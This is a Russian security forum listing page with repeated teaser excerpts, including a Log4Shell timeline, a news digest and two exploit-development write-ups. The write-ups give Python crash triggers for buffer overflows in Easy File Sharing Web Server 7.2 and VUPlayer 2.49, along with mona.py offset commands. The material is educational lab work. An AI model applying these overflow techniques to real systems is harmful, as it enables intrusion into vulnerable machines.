Форум информационной безопасности - Codeby.net
Статья А как это было? - Log4Shell
Здравия всем, дамы и господа. Пока статья о Conti готовится я решил объеденить все материалы, что сейчас есть на Log4Shell, т.к. тема всё-таки новая, а Conti уже и так достаточно долго ждал, подождёт ещё недельку.
24 ноября
Группа облачной безопасности Alibaba сообщает Apache об уязвимости.
Имеются сообщения об использовании уязвимости злоумышленниками.
Я думаю многие из вас читали мою новостную статью за тот период. Тогда я впервые узнал про Log4Shell. Думаю, некоторые из вас тоже.
Первый PoC-эксплойт (Proof of Concept) появился в сети в ночь с 9 на 10 декабря, что, видимо, и стало точкой невозврата.
После появления превого, следующие эксплойты для критической уязвимости нулевого...
24 ноября
Группа облачной безопасности Alibaba сообщает Apache об уязвимости.
1-10 декабря
Имеются сообщения об использовании уязвимости злоумышленниками.
10 декабря
Я думаю многие из вас читали мою новостную статью за тот период. Тогда я впервые узнал про Log4Shell. Думаю, некоторые из вас тоже.
Первый PoC-эксплойт (Proof of Concept) появился в сети в ночь с 9 на 10 декабря, что, видимо, и стало точкой невозврата.
После появления превого, следующие эксплойты для критической уязвимости нулевого...
Статья Stryker - или как я пытаюсь перевернуть мобильный пентест!
Привет всем, я снова бросил себе вызов по мобильной разработке и кажется справился на отлично!) Но это судить не мне, а вам, приятного чтения!
Идея и Дисклеймер
Давайте будем честны, большинство людей считают мобильный пентест "невозможным", "неудобным" или "только терминал". И скорее именно из-за этого — я и решил написать свою собственную программу которая способна убить эти стереотипы!(надеюсь). P.s. те кто "только терминал, только хардкор, только не с телефона", просьба не читать дальше ведь там GUI
1. Анализ Конкурентов
Ну во-первых, стоит рассмотреть что уже есть, ведь из-за каких-то приложений возникли мнения выше!
1) Nethunter
Детище offsec на Debian. Так как это обычный linux, то он умеет "почти все" что и ПК, ограничения только по железу.
...
Идея и Дисклеймер
Давайте будем честны, большинство людей считают мобильный пентест "невозможным", "неудобным" или "только терминал". И скорее именно из-за этого — я и решил написать свою собственную программу которая способна убить эти стереотипы!(надеюсь). P.s. те кто "только терминал, только хардкор, только не с телефона", просьба не читать дальше ведь там GUI
1. Анализ Конкурентов
Ну во-первых, стоит рассмотреть что уже есть, ведь из-за каких-то приложений возникли мнения выше!
1) Nethunter
Детище offsec на Debian. Так как это обычный linux, то он умеет "почти все" что и ПК, ограничения только по железу.
Статья Easy File Sharing Web Server 7.2 SEH overflow
Тестирование проводилось на Windows XP SP3 x86 En (no dep)
Уязвимое ПО:
Запускаем ПО
И аттачимся отладчиком Immunity Debugger к процессу, дальше передаем программе входной поток. Посмотрим как оно себя поведет.
посмотрим Chain SEH
Сгенерирум строку паттерн используя плагин mona.py
!mona pc 50000
Скопируем сгенерированную строку ASCII строку в наш триггер сплойт...
Уязвимое ПО:
Запускаем ПО
И аттачимся отладчиком Immunity Debugger к процессу, дальше передаем программе входной поток. Посмотрим как оно себя поведет.
Python:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from struct import pack
import socket
payload = "A"*5000
exploit = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
exploit.connect(("127.0.0.1",80))
exploit.send("GET " + payload + " HTTP/1.1\r\n")
exploit.close()посмотрим Chain SEH
Сгенерирум строку паттерн используя плагин mona.py
!mona pc 50000
Скопируем сгенерированную строку ASCII строку в наш триггер сплойт...
Статья Новостной дайджест по ИБ/IT за 20.12-27.12
Здравия всем, дамы и господа, речь сегодня вновь пойдёт пойдёт о прошлом. О том что произошло и во что это, возможно, выльется. Приглашаю вас к прочтению и приятного времяпрепровождения.
Если вы это видите, значит меня уже нет
Очень частый приём из медиа-культуры, однако не так давно он стал реальностью. Как выяснилось, господин Сачков ещё год назад записал видео на случай своего убийства или ареста. Он переслал ролик своим близким и друзьям. В нем Сачков рассказывает, что за ним следят, и он опасается того, что неизвестные лица его убьют. Также Сачков предполагал, что правоохранительные органы могут его обвинить в госизмене и арестовать. А его, как мы помним, арестовали именно по подозрению в госизмене. Сейчас эта информация просто существует в вакууме и, насколько мне известно, развития не получила...
Если вы это видите, значит меня уже нет
Очень частый приём из медиа-культуры, однако не так давно он стал реальностью. Как выяснилось, господин Сачков ещё год назад записал видео на случай своего убийства или ареста. Он переслал ролик своим близким и друзьям. В нем Сачков рассказывает, что за ним следят, и он опасается того, что неизвестные лица его убьют. Также Сачков предполагал, что правоохранительные органы могут его обвинить в госизмене и арестовать. А его, как мы помним, арестовали именно по подозрению в госизмене. Сейчас эта информация просто существует в вакууме и, насколько мне известно, развития не получила...
Статья VUPlayer 2.49 .wax vanilla EIP overflow
Тестрирование проводилось на ОС Windows 7 x32 с отключенным DEP.
Создадим эксплойт триггер чтобы перезаписать регистр EIP.
Запускаем Vuplayer под отладчиком
и скармливаем наш файловый сплойт.
Как мы видим мы успешно перезаписали EIP регистр. Теперь вычислим смещение до регистра EIP. Воспользуемся плагином mona.py
!mona pc 5000
Созданную ASCII строку скопируем в наш сплойт. Затем повторим процесс передачи созданного нами файла в уязвимую программу под отладчиком. Нажимаем Ctrl+F2, F9 и кормим файлом…
Как мы видим выполнение программы остановилось...
Создадим эксплойт триггер чтобы перезаписать регистр EIP.
Python:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
payload = "A"*5000
file = open('exploit.wax', 'w')
print "Create file exploit"
file.write(payload)
print "Write payload"Запускаем Vuplayer под отладчиком
и скармливаем наш файловый сплойт.
Как мы видим мы успешно перезаписали EIP регистр. Теперь вычислим смещение до регистра EIP. Воспользуемся плагином mona.py
!mona pc 5000
Созданную ASCII строку скопируем в наш сплойт. Затем повторим процесс передачи созданного нами файла в уязвимую программу под отладчиком. Нажимаем Ctrl+F2, F9 и кормим файлом…
Как мы видим выполнение программы остановилось...
Codeby Games CTF
Категории блога
Наши курсы
Команда онлайн
-
savlWell-known member
Наши книги
